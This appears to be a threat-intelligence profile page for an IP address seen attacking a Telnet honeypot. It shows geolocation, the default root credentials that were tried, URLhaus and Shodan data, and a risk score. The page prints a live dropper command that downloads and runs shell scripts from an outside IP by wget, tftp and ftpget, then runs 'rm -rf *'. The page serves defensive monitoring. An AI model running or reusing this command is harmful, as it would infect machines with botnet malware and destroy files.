TROYANOSYVIRUS
Active Threat β€’ LOW

23.95.100.174

First Detection5/3/2026
Last Activity5/3/2026
ISPHostPapa
🎯
15
Total Attacks
πŸ”Œ
1
Ports
πŸ“‘
1
Attack Types
🦠
1
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Buffalo
ASN
AS36352
ISP
HostPapa

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

πŸ”root/root
1x
πŸ”root/toor
1x
πŸ”root/admin
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.206.225.136/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.206.225.136 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.206.225.136; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.206.225.136 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit2x
$sh1x

URLhaus Intel1 URLsabuse.ch

This IP has used the following known malicious URLs:

http://5.206.225.136/bins.sh
offlinemalware_download

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
224435985
Hostnames
23-95-100-174-host.colocrossing.com
CPEs
cpe:/o:linux:linux_kernel

Risk Assessment

25
/100
LowMediumHighCritical